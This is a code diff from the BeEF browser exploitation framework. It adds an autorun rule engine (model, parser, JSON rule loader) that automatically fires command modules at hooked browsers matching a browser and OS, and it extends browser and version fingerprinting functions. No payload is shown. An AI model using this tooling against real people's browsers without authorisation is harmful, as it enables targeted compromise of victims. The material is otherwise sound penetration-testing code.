+          property :author, String                                   # rule author
+          property :browser, String, :length => 10                   # browser name
+          property :browser_version, String, :length => 15           # browser version
+          property :os, String, :length => 10                        # OS name
+          property :os_version, String, :length => 15                # OS version
+          property :modules, Text                                    # JSON stringyfied representation of the JSON rule for further parsing
+          property :execution_order, Text                            # command module execution order
+          property :execution_delay, Text                            # command module time delays
+          property :chain_mode, String, :length => 40                 # rule chaining mode
+
+          has n, :executions
+        end
+      end
+    end
+  end
+end
--- a/core/main/autorun_engine/parser.rb
+++ b/core/main/autorun_engine/parser.rb
@@ -0,0 +1,82 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class Parser
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+        end
+
+        BROWSER = ['FF','C','IE','S','O','ALL']
+        OS = ['Linux','Windows','OSX','Android','iOS','BlackBerry','ALL']
+        VERSION = ['<','<=','==','>=','>','ALL','Vista','XP']
+        CHAIN_MODE = ['sequential','nested-forward']
+        MAX_VER_LEN = 15
+        # Parse a JSON ARE file and returns an Hash with the value mappings
+        def parse(name,author,browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
+          begin
+            success = [true]
+
+            return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
+            return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
+            return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
+
+            return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
+
+            if browser_version != 'ALL'
+              return [false, 'Illegal browser_version definition'] unless
+                  VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
+                      BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
+            end
+
+            if os_version != 'ALL'
+              return [false, 'Illegal os_version definition'] unless
+                  VERSION.include?(os_version[0,2].gsub(/\s+/,'')) &&
+                      BeEF::Filters::is_valid_osversion?(os_version[2..-1].gsub(/\s+/,'')) && os_version.length < MAX_VER_LEN
+            end
+
+            return [false, 'Illegal os definition'] unless OS.include?(os)
+
+            # check if module names, conditions and options are ok
+            modules.each do |cmd_mod|
+              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              if mod != nil
+                modk = BeEF::Module.get_key_by_database_id(mod.id)
+                mod_options = BeEF::Module.get_options(modk)
+
+                opt_count = 0
+                mod_options.each do |opt|
+                   if opt['name'] == cmd_mod['options'].keys[opt_count]
+                     opt_count += 1
+                   else
+                     return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
+                                             }) for module (#{cmd_mod['name']}) does not exist"]
+                   end
+                end
+              else
+                return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
+              end
+            end
+
+            exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
+            exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}
+
+            success
+          rescue => e
+            print_error "#{e.message}"
+            print_debug "#{e.backtrace.join("\n")}"
+            return [false, 'Something went wrong.']
+          end
+        end
+      end
+    end
+  end
+end
--- a/core/main/autorun_engine/rule_loader.rb
+++ b/core/main/autorun_engine/rule_loader.rb
@@ -0,0 +1,95 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class RuleLoader
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+        end
+
+        # this expects parsed JSON as input
+        def load(data)
+          begin
+
+            name = data['name']
+            author = data['author']
+            browser = data['browser']||'ALL'
+            browser_version = data['browser_version']||'ALL'
+            os = data['os']||'ALL'
+            os_version = data['os_version']||'ALL'
+            modules = data['modules']
+            exec_order = data['execution_order']
+            exec_delay = data['execution_delay']
+            chain_mode = data['chain_mode']
+
+            parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
+                name,author,browser,browser_version,os,os_version,modules,exec_order,exec_delay,chain_mode)
+
+            if parser_result.length == 1 && parser_result.first
+              print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
+              print_more "Target Browser: #{browser} (#{browser_version})"
+              print_more "Target OS: #{os} (#{os_version})"
+              print_more "Modules to Trigger:"
+                         modules.each do |mod|
+                            print_more "(*) Name: #{mod['name']}"
+                            print_more "(*) Condition: #{mod['condition']}"
+                            print_more "(*) Code: #{mod['code']}"
+                            print_more "(*) Options:"
+                            mod['options'].each do |key,value|
+                              print_more "\t#{key}: (#{value})"
+                            end
+                         end
+              print_more "Exec order: #{exec_order}"
+              print_more "Exec delay: #{exec_delay}"
+              are_rule = BeEF::Core::AutorunEngine::Models::Rule.new(
+                  :name => name,
+                  :author => author,
+                  :browser => browser,
+                  :browser_version => browser_version,
+                  :os => os,
+                  :os_version => os_version,
+                  :modules => modules.to_json,
+                  :execution_order => exec_order,
+                  :execution_delay => exec_delay,
+                  :chain_mode => chain_mode)
+              are_rule.save
+              return { 'success' => true, 'rule_id' => are_rule.id}
+            else
+              print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
+              return { 'success' => false, 'error' => parser_result.last }
+            end
+
+          rescue => e
+            err = 'Malformed JSON ruleset.'
+            print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
+            return { 'success' => false, 'error' => err }
+          end
+        end
+
+        def load_file(json_rule_path)
+          begin
+            rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
+            self.load JSON.parse(rule_file)
+          rescue => e
+            print_error "[ARE] Failed to load ruleset from #{json_rule_path}"
+          end
+        end
+
+        def load_directory
+          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
+            print_info "[ARE] Processing rule: #{rule}"
+            self.load_file rule
+          end
+        end
+      end
+    end
+  end
+end
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,47 +1,18 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

 beef.are = {
-  init:function(){
-   var Jools = require('jools');
-   this.ruleEngine = new Jools();
+  status_success: function(){
+    return 1;
  },
-  send:function(module){
-    // there will probably be some other stuff here before things are finished
-    this.commands.push(module);
+  status_unknown: function(){
+    return 0;
  },
-  execute:function(inputs){
-    this.rulesEngine.execute(input);
-  },
-  cache_modules:function(modules){},
-  rules:[
-    {
-      'name':"exec_no_input",
-      'condition':function(command,browser){
-          //need to figure out how to handle the inputs
-          return (!command['inputs'] || command['inputs'].length == 0)
-       },
-      'consequence':function(command,browser){}
-    },
-    {
-      'name':"module_has_sibling",
-      'condition':function(command,commands){
-        return false;
-      },
-      'consequence':function(command,commands){}
-    },
-    {
-      'name':"module_depends_on_module",
-      'condition':function(command,commands){
-        return false;
-      },
-      'consequence':function(command,commands){}
-    }
-  ],
-  commands:[],
-  results:[]
+  status_error: function(){
+    return -1;
+  }
 };
 beef.regCmp("beef.are");
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -322,7 +322,127 @@ beef.browser = {
     * @example: beef.browser.isFF28()
     */
    isFF28: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
+    },
+
+    /**
+     * Returns true if FF29
+     * @example: beef.browser.isFF29()
+     */
+    isFF29: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
+    },
+
+    /**
+     * Returns true if FF30
+     * @example: beef.browser.isFF30()
+     */
+    isFF30: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
+    },
+
+    /**
+     * Returns true if FF31
+     * @example: beef.browser.isFF31()
+     */
+    isFF31: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
+    },
+
+    /**
+     * Returns true if FF32
+     * @example: beef.browser.isFF32()
+     */
+    isFF32: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
+    },
+
+    /**
+     * Returns true if FF33
+     * @example: beef.browser.isFF33()
+     */
+    isFF33: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
+    },
+
+    /**
+     * Returns true if FF34
+     * @example: beef.browser.isFF34()
+     */
+    isFF34: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
+    },
+
+    /**
+     * Returns true if FF35
+     * @example: beef.browser.isFF35()
+     */
+    isFF35: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
+    },
+
+    /**
+     * Returns true if FF36
+     * @example: beef.browser.isFF36()
+     */
+    isFF36: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
+    },
+
+    /**
+     * Returns true if FF37
+     * @example: beef.browser.isFF37()
+     */
+    isFF37: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
+    },
+
+    /**
+     * Returns true if FF38
+     * @example: beef.browser.isFF38()
+     */
+    isFF38: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
+    },
+
+    /**
+     * Returns true if FF39
+     * @example: beef.browser.isFF39()
+     */
+    isFF39: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
+    },
+
+    /**
+     * Returns true if FF40
+     * @example: beef.browser.isFF40()
+     */
+    isFF40: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/40./) != null;
+    },
+
+    /**
+     * Returns true if FF41
+     * @example: beef.browser.isFF41()
+     */
+    isFF41: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/41./) != null;
+    },
+
+    /**
+     * Returns true if FF42
+     * @example: beef.browser.isFF42()
+     */
+    isFF42: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/42./) != null;
+    },
+
+    /**
+     * Returns true if FF43
+     * @example: beef.browser.isFF43()
+     */
+    isFF43: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/43./) != null;
    },

    /**
@@ -330,7 +450,7 @@ beef.browser = {
     * @example: beef.browser.isFF()
     */
    isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43();
    },

    /**
@@ -357,12 +477,28 @@ beef.browser = {
        return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
    },

+    /**
+     * Returns true if Safari 7.xx
+     * @example: beef.browser.isS7()
+     */
+    isS7: function () {
+        return (window.navigator.userAgent.match(/ Version\/7\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
+
+    /**
+     * Returns true if Safari 8.xx
+     * @example: beef.browser.isS8()
+     */
+    isS8: function () {
+        return (window.navigator.userAgent.match(/ Version\/8\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
+
    /**
     * Returns true if Safari.
     * @example: beef.browser.isS()
     */
    isS: function () {
-        return this.isS4() || this.isS5() || this.isS6();
+        return this.isS4() || this.isS5() || this.isS6() || this.isS7() || this.isS8();
    },

    /**
@@ -678,12 +814,12 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 31.
-         * @example: beef.browser.isC31iOS()
-         */
-        isC31iOS: function () {
-            return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
-        },
+     * Returns true if Chrome for iOS 31.
+     * @example: beef.browser.isC31iOS()
+     */
+    isC31iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
+    },

    /**
     * Returns true if Chrome 32.
@@ -694,9 +830,9 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 32.
-         * @example: beef.browser.isC32iOS()
-         */
+     * Returns true if Chrome for iOS 32.
+     * @example: beef.browser.isC32iOS()
+     */
    isC32iOS: function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
    },
@@ -710,9 +846,9 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 33.
-         * @example: beef.browser.isC33iOS()
-         */
+     * Returns true if Chrome for iOS 33.
+     * @example: beef.browser.isC33iOS()
+     */
    isC33iOS: function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
    },
@@ -726,9 +862,9 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 34.
-         * @example: beef.browser.isC34iOS()
-         */
+     * Returns true if Chrome for iOS 34.
+     * @example: beef.browser.isC34iOS()
+     */
    isC34iOS: function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
    },
@@ -742,9 +878,9 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 35.
-         * @example: beef.browser.isC35iOS()
-         */
+     * Returns true if Chrome for iOS 35.
+     * @example: beef.browser.isC35iOS()
+     */
    isC35iOS: function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
    },
@@ -758,20 +894,175 @@ beef.browser = {
    },

    /**
-         * Returns true if Chrome for iOS 36.
-         * @example: beef.browser.isC36iOS()
-         */
+     * Returns true if Chrome for iOS 36.
+     * @example: beef.browser.isC36iOS()
+     */
    isC36iOS: function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
    },
-    
+
+    /**
+     * Returns true if Chrome 37.
+     * @example: beef.browser.isC37()
+     */
+    isC37: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 37) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 37.
+     * @example: beef.browser.isC37iOS()
+     */
+    isC37iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 38.
+     * @example: beef.browser.isC38()
+     */
+    isC38: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 38) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 38.
+     * @example: beef.browser.isC38iOS()
+     */
+    isC38iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 38) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 39.
+     * @example: beef.browser.isC39()
+     */
+    isC39: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 39) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 39.
+     * @example: beef.browser.isC39iOS()
+     */
+    isC39iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 40.
+     * @example: beef.browser.isC40()
+     */
+    isC40: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 40) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 40.
+     * @example: beef.browser.isC40iOS()
+     */
+    isC40iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 40) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 41.
+     * @example: beef.browser.isC41()
+     */
+    isC41: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 41) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 41.
+     * @example: beef.browser.isC41iOS()
+     */
+    isC41iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 41) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 42.
+     * @example: beef.browser.isC42()
+     */
+    isC42: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 42) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 42.
+     * @example: beef.browser.isC42iOS()
+     */
+    isC42iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 42) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 43.
+     * @example: beef.browser.isC43()
+     */
+    isC43: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 43) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 43.
+     * @example: beef.browser.isC43iOS()
+     */
+    isC43iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 43) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 44.
+     * @example: beef.browser.isC44()
+     */
+    isC44: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 44) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 44.
+     * @example: beef.browser.isC44iOS()
+     */
+    isC44iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 44) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 45.
+     * @example: beef.browser.isC45()
+     */
+    isC45: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 45) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 46.
+     * @example: beef.browser.isC46()
+     */
+    isC46: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 46) ? true : false);
+    },
+
+    isC47: function () {
+        return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 47) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 45.
+     * @example: beef.browser.isC45iOS()
+     */
+    isC45iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 45) ? true : false);
+    },

    /**
     * Returns true if Chrome.
     * @example: beef.browser.isC()
     */
    isC: function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC46()  || this.isC47()|| this.isC45iOS();
    },

    /**
@@ -822,6 +1113,19 @@ beef.browser = {
        return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
    },

+    /**
+     * Returns a hash of string keys representing a given capability
+     * @example: beef.browser.capabilities()["navigator.plugins"]
+     */
+    capabilities: function () {
+        var out = {};
+        var type = this.type();
+
+        out["navigator.plugins"] = (type.IE11 || !type.IE);
+
+        return out;
+    },
+
    /**
     * Returns the type of browser being used.
